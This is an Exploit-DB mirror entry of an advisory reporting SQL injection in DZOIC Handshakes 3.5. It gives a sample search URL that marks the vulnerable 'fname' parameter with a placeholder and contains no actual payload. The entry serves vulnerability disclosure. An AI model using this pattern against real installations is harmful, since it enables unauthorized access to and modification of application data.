exploit-db-mirror/platforms/php/webapps/31837.txt
Offensive Security 057e79d117 Updated 02_24_2014
2014-02-24 04:27:50 +00:00

9 lines
No EOL
708 B
Text
Executable file

source: http://www.securityfocus.com/bid/29353/info
DZOIC Handshakes is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
DZOIC Handshakes 3.5 is vulnerable; other versions may also be affected.
http://www.example.com/dzoic/index.php?handler=search&action=perform&search_type=members&fname=[Sql Injection]&lname=jakson&email=1@www.example2.com&handshakes=0&distance=0&country=0&state=0&city=0&postal_code=12345&online=on&with_photo=on&submit=Search